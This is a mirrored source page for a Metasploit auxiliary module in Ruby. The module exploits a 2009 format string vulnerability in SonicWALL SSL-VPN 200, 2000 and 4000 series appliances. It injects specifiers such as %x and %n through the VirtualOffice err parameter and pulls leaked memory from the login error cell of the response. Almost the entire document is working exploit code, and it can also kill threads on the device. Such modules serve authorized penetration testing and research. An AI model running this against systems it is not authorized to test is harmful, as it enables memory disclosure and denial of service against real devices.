CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/http/sonicwall_ssl_format.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8
  include Msf::Auxiliary::Dos # %n etc kills a thread, but otherwise ok.

9


10
  def initialize(info = {})

11
    super(update_info(info,

12
      'Name'           => 'SonicWALL SSL-VPN Format String Vulnerability',

13
      'Description'    => %q{

14
        There is a format string vulnerability within the SonicWALL

15
        SSL-VPN Appliance - 200, 2000 and 4000 series. Arbitrary memory

16
        can be read or written to, depending on the format string used.

17
        There appears to be a length limit of 127 characters of format

18
        string data. With physical access to the device and debugging,

19
        this module may be able to be used to execute arbitrary code remotely.

20
      },

21
      'Author'         => [ 'aushack' ],

22
      'License'        => MSF_LICENSE,

23
      'References'     => [

24
        [ 'BID', '35145' ],

25
        #[ 'CVE', '' ], # no CVE?

26
        [ 'OSVDB', '54881' ],

27
        [ 'URL', 'http://www.aushack.com/200905-sonicwall.txt' ],

28
      ],

29
      'DisclosureDate' => '2009-05-29'))

30


31
    register_options([

32
      OptString.new('URI', [ true, 'URI to request', '/cgi-bin/welcome/VirtualOffice?err=' ]),

33
      OptString.new('FORMAT', [ true, 'Format string (i.e. %x, %s, %n, %p etc)', '%x%x%x%x%x%x%x' ]),

34
      Opt::RPORT(443),

35
      OptBool.new('SSL', [true, 'Use SSL', true]),

36
    ])

37
  end

38


39
  def run

40
    if (datastore['FORMAT'].length > 125) # Max length is 127 bytes

41
      print_error("FORMAT string length cannot exceed 125 bytes.")

42
      return

43
    end

44


45
    fmt = datastore['FORMAT'] + "XX"  # XX is 2 bytes used to mark end of memory garbage for regexp

46
    begin

47
      res = send_request_raw({

48
        'uri' => normalize_uri(datastore['URI']) + fmt,

49
      })

50


51
      if res and res.code == 200

52
        res.body.scan(/\<td class\=\"loginError\"\>(.+)XX/ism)

53
        print_status("Information leaked: #{$1}")

54
      end

55


56
      print_status("Request sent to #{rhost}:#{rport}")

57
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout

58
      print_status("Couldn't connect to #{rhost}:#{rport}")

59
    rescue ::Timeout::Error, ::Errno::EPIPE

60
    end

61
  end

62
end

63


64